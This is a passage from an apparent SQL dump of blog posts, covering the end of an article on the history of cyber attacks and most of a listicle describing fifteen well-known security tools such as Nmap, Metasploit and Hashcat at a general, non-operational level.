However, the cost of a breach—lost revenue, damaged reputation, and legal action—can be devastating for a small business.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Simple Steps SMBs Can Take</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Invest in Basic Security Measures</strong></b>: Ensure firewalls, antivirus software, and data encryption are in place.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Train Employees</strong></b>: Many breaches start with human error. 
Regular training helps staff recognize suspicious emails or phishing attempts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Create a Cybersecurity Plan</strong></b>: Map out your incident response, regularly back up your data, and monitor for vulnerabilities.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity for small businesses isn’t just a technical responsibility—it’s about survival in a digital-first economy.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Conclusion</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reflecting on the evolution of cyber attacks offers a window into how far cyber threats have come—and how cybersecurity defenses have adapted in response. For IT professionals, small business owners, or cybersecurity enthusiasts, the key takeaway is clear: staying informed and proactive is the best defense.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The future of cybersecurity is exciting and daunting in equal measure, with threats continuing to evolve alongside technology. Whether you’re bolstering your company’s IT security or simply brushing up on cybersecurity trends, the lessons of the past can help prepare for the challenges of tomorrow.</p>', '', NULL, NULL, 1, 'draft', '2025-01-21 15:18:04', '2026-01-12 21:41:44', 'Information Security', 'The Evolution of Cyber Attacks: A Historical Perspective', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(68, '15 Best Cybersecurity Tools You Need to Know in 2025', '15-best-cybersecurity-tools-you-need-to-know-in-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity isn’t just a choice anymore—it’s a necessity. With cyberattacks growing more sophisticated each year, protecting sensitive data and networks is now critical for both businesses and individuals. From safeguarding classified business information to protecting personal financial data or intellectual property, adopting robust cybersecurity measures can be the difference between safety and catastrophic losses.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Thankfully, advancements in technology offer powerful tools to monitor, detect, and prevent cyber threats. This article highlights the <b><strong class=\"font-bold\">15 best cybersecurity tools for 2025</strong></b>, covering their standout features and practical applications so that IT professionals, businesses, and individuals alike can improve their digital security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Cybersecurity Tools are Essential in 2025</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The fast-evolving cyber threat landscape requires cutting-edge strategies. Cybercriminals are increasingly using innovative tactics to infiltrate systems, and traditional methods are no longer enough to combat these threats. 
Cybersecurity tools provide organizations and individuals with <b><strong class=\"font-bold\">proactive measures</strong></b> to detect vulnerabilities, minimize risks, and strengthen defenses against common cyber threats like phishing, ransomware, and data breaches.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Whether you’re running a small business, managing enterprise systems, or just browsing the web, these tools make staying one step ahead possible.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Overview of the Top Cybersecurity Tools</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">No single tool can meet all cybersecurity requirements, as each tool specializes in protecting a specific aspect of digital security. From scanning vulnerable networks to encrypting sensitive files, here are the <b><strong class=\"font-bold\">15 best cybersecurity tools</strong></b> you need to know about in 2025.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. 
<b><strong class=\"font-bold\">Nmap (Network Mapper)</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Discovers open ports, maps out networks, and provides security auditing.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Open-source, highly versatile, and widely used for vulnerability assessments.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Wireshark</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Captures and analyzes network traffic at a microscopic level.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Industry-standard for troubleshooting network protocols and identifying anomalies.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
<b><strong class=\"font-bold\">Metasploit Framework</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: A penetration testing tool with an extensive library of exploits and modules.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Helps IT professionals test systems against known vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. <b><strong class=\"font-bold\">Kali Linux</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Provides a wide suite of pre-installed penetration testing and auditing tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Highly popular in cybersecurity education and practice for ethical hackers.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
<b><strong class=\"font-bold\">Burp Suite</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Tests the security of web applications for common vulnerabilities like SQL injection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Comprehensive and easy to use for both beginners and pros.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. <b><strong class=\"font-bold\">Nessus</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Scans systems and networks to find and fix vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: A favorite for security professionals due to its detailed reporting.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
<b><strong class=\"font-bold\">Aircrack-ng</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Analyzes and cracks Wi-Fi security protocols.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Effective for testing the strength of wireless networks.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. <b><strong class=\"font-bold\">John the Ripper</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Tests password strength by performing brute-force attacks.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Lightweight, fast, and supports many encryption formats.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. 
<b><strong class=\"font-bold\">Hashcat</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Accelerates hash-cracking using GPUs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Versatile and consistently ranks as one of the fastest password recovery tools.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. <b><strong class=\"font-bold\">TheHarvester</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Gathers valuable information about an organization, such as emails and vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Essential for open-source intelligence in penetration testing.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">11. 
<b><strong class=\"font-bold\">OWASP ZAP (Zed Attack Proxy)</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Automatically scans web apps for vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Open-source and beginner-friendly.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">12. <b><strong class=\"font-bold\">Splunk</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Collects and analyzes machine data for real-time insights and threat detection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: A powerful tool for security information and event management (SIEM).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">13. 
<b><strong class=\"font-bold\">Elasticsearch</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: A search and analytics engine ideal for log management and threat hunting.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Built for scalability and speed.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">14. <b><strong class=\"font-bold\">Sysinternals Suite</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Troubleshoots and analyzes Windows systems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Offers dozens of tools, such as Process Explorer and Autoruns.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">15. 
<b><strong class=\"font-bold\">KeePass</strong></b></h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">What it does</strong></b>: Manages passwords securely.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Why it’s great</strong></b>: Free, lightweight, and open-source.</li>\r\n</ul>\r\n&nbsp;\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Their Use Cases</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. 
<b><strong class=\"font-bold\">Nmap (Network Mapper)</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A robust open-source utility for network discovery and security auditing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identifies active hosts (IP &amp; MAC addresses).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Detects running services (e.g., HTTP, SSH, FTP).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Performs port scanning to identify open ports.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Determines operating systems on target devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\">Scans for known vulnerabilities.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
<b><strong class=\"font-bold\">Wireshark</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The go-to protocol analyzer for network traffic capture and analysis.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Troubleshoots network connectivity problems.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Analyzes packet contents to understand app communication.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Monitors for malicious activities like malware.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Conducts forensic analysis for incident investigations.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
<b><strong class=\"font-bold\">Metasploit</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A highly effective penetration testing framework with a vast exploit library.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tests vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Develops custom exploits for new vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Delivers payloads like malware or reverse shells.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Manages post-exploitation access.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
<b><strong class=\"font-bold\">Kali Linux</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A Debian-based Linux OS designed for penetration testing and auditing.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Key Features &amp; Use Cases:</strong></b></p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Comprehensive security assessments.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Identifies system vulnerabilities.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Conducts digital forensics investigations.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\">Performs wireless network audits.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
